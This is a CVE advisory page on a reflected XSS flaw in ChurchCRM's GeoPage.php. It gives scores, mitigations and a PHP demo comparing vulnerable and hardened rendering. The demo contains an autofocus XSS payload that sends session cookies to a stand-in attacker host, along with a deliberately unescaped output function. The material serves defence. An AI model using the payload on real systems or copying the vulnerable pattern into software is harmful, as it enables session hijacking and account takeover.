CVE-2026-39332
Published: 07 April 2026
Summary
CVE-2026-39332 is a high-severity reflected Cross-site Scripting (CWE-79) vulnerability in ChurchCRM. Its CVSS v3.1 base score is 8.7 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique Browser Session Hijacking (T1185). It ranks at the 11.3 percentile for exploit likelihood (below the median) and is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-15 (Information Output Filtering) and SI-2 (Flaw Remediation).
Threat & Defense Details
Mitigating Controls (NIST 800-53 r5)
- SI-2 (Flaw Remediation): addresses the reflected XSS directly by requiring timely identification, testing and installation of the fix shipped in ChurchCRM 7.1.0.
- SI-15 (Information Output Filtering): prevents execution of injected JavaScript in GeoPage.php output by encoding reflected user input for its HTML context, so a payload such as the advisory's autofocus-triggered script is rendered as text rather than interpreted as markup.
- Input validation: rejects crafted form input to GeoPage.php before it is reflected, so malicious JavaScript never reaches a victim's browser in the first place.
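To make the two code-level controls above concrete, here is an added illustration in PHP (the project's language). It is not ChurchCRM's code and not GeoPage.php: the page name, the `location` field, the `render_*` and `validate_location` functions and the payload are all assumptions for the demo. It shows a reflected value echoed raw into an attribute, the same value after context-aware output encoding, and an allow-list validator that rejects the payload before reflection.

```php
<?php
// Added illustration, not ChurchCRM code. Field name, function names and the
// payload are assumptions for the demo; GeoPage.php itself is not shown here.

// Constructed request: the victim has been lured into submitting a form whose
// "location" field carries an attribute-breakout payload. It needs no click,
// because autofocus fires the onfocus handler as soon as the page renders.
$request = [
    'location' => '" autofocus onfocus="fetch(\'https://attacker.example/?c=\'+document.cookie)" x="',
];

// VULNERABLE pattern: the submitted value is reflected straight into an attribute,
// so the leading double quote closes value="" and the rest becomes new attributes.
function render_vulnerable(array $req): string
{
    $value = $req['location'] ?? '';
    return '<input type="text" name="location" value="' . $value . '">';
}

// HARDENED (SI-15, output filtering): encode for the HTML attribute context.
// ENT_QUOTES matters: without it a double quote survives and still terminates
// the attribute. Always encode at the point of output, for the exact context.
function render_hardened(array $req): string
{
    $value = htmlspecialchars($req['location'] ?? '', ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="location" value="' . $value . '">';
}

// HARDENED (input validation): allow-list what a location name may contain and
// reject everything else before it is stored or reflected. An allow-list is
// preferred over a JavaScript blocklist, which is trivially bypassed.
function validate_location(string $value): bool
{
    return (bool) preg_match('/^[\p{L}\p{N} .,\'-]{1,100}$/u', $value);
}

echo "vulnerable: ", render_vulnerable($request), PHP_EOL;
echo "hardened:   ", render_hardened($request), PHP_EOL;

var_dump(validate_location($request['location']));
var_dump(validate_location("St. Mary's, Elm Street"));
```

In the vulnerable rendering the browser sees a second `autofocus` attribute and an `onfocus` handler, so the handler runs on page load with no interaction. In the hardened rendering every `"` becomes `&quot;` and every `'` becomes `&apos;`, so the whole payload stays inside the original `value` attribute as inert text. The validator rejects the payload and accepts an ordinary place name, which is the defence-in-depth layer; output encoding is the control that must not be skipped, because validation rules for legitimate data can rarely exclude every dangerous character.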
MITRE ATT&CK Enterprise Techniques
Why these techniques?
Reflected XSS lets the attacker run arbitrary JavaScript in the victim's browser, which directly enables browser session hijacking (T1185) and theft of web session cookies (T1539), leading to account compromise.
NVD Description
ChurchCRM is an open-source church management system. Prior to 7.1.0, a reflected Cross-Site Scripting (XSS) vulnerability in GeoPage.php allows any authenticated user to inject arbitrary JavaScript into the browser of another authenticated user. Because the payload fires automatically via autofocus with no user interaction required, an attacker can steal session cookies and fully take over any victim account, including administrator accounts, by tricking them into submitting a crafted form. This vulnerability is fixed in 7.1.0.
Deeper analysis
ChurchCRM, an open-source church management system, contains a reflected Cross-Site Scripting (XSS) vulnerability designated as CVE-2026-39332 in its GeoPage.php component prior to version 7.1.0. This issue, linked to CWE-79 and rated 8.7 on the CVSS v3.1 scale (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N), enables the injection of arbitrary JavaScript code into the browsers of other users.
Any authenticated user can exploit this against another authenticated user. The victim must be lured into submitting a crafted form (the UI:R in the vector), but once the reflected response loads, the payload fires through an autofocus attribute with no further click, so the attacker can steal session cookies and fully compromise the victim's account, including administrator accounts.
The vulnerability is addressed in ChurchCRM version 7.1.0. Additional details on the issue and remediation are available in the GitHub security advisory at https://github.com/ChurchCRM/CRM/security/advisories/GHSA-hc6g-h48v-wqvq.
Details
- CWE(s)